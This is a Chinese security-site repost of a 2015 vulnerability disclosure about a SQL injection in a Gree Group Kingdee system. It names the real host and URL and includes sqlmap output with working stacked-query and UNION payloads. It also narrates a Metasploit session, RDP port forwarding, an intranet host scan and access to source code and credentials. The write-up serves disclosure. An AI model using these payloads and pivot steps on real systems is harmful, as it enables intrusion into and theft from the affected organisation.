频道栏目
首页 > 安全 > 网站安全 > 正文

格力集团某系统漏洞导致内网漫游

2015-12-24 09:13:58      个评论    来源:路人甲   作者:路人甲
收藏   我要投稿

 格力空调安徽


一个注射引发的内网沦陷

http://61.190.20.51/kingdee/flow_design/flow_class_custom_add.jsp?class_id=1

小菜没什么技术,只会用用工具
 

Parameter: class_id (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: class_id=1;WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: class_id=1 UNION ALL SELECT NULL,CHAR(113)+CHAR(112)+CHAR(120)+CHAR
(118)+CHAR(113)+CHAR(118)+CHAR(120)+CHAR(65)+CHAR(79)+CHAR(110)+CHAR(68)+CHAR(10
0)+CHAR(72)+CHAR(117)+CHAR(86)+CHAR(113)+CHAR(120)+CHAR(107)+CHAR(120)+CHAR(113)
,NULL--
---
[13:20:30] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2005
[13:20:30] [INFO] fetching current user
current user:    'sa'
[13:20:30] [INFO] fetched data logged to text files under 'C:\Administrator\.sqlmap
\output\61.190.20.51'

接下来就是sqlmap + metasploit 的时间了

1.png

 

2.png

 

5.png

6.png

可以看到成功上传payload,并建立了session

开启端口转发,将目标机器的3389转到本地3489

7.png


kali 是虚拟机 现在退到物理机连接kali(172.16.0.20) 的3489
 

8.jpg


sql server数据库
 

9.jpg


写个bat检测内网存活主机
 

11.jpg


在目标机上连接内网192.168.0.141,还是个08的系统
 

12.jpg


翻一翻,会不会有惊喜呢...
 

13.jpg

 

14.jpg


看到有好多网站开发代码,还有svn,难道是做程序开发的???

内网还有机器就不一一去试了,点到为止

嗯,还有什么呢... 对了,管理员密码是直接放到网站就跑出来了,建议修改密码吧

最后的最后,怎样才能脱离路人啊...

解决方案:

修复,你们更专业!!!

上一篇:瑞丽网重置任意手机用户密码
下一篇:海信集团某业务系统可查16万工程师/1.8万门店/1.1万合同(保守金额数十亿)/大量用户档案/任意工单综合信息(超详细)
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站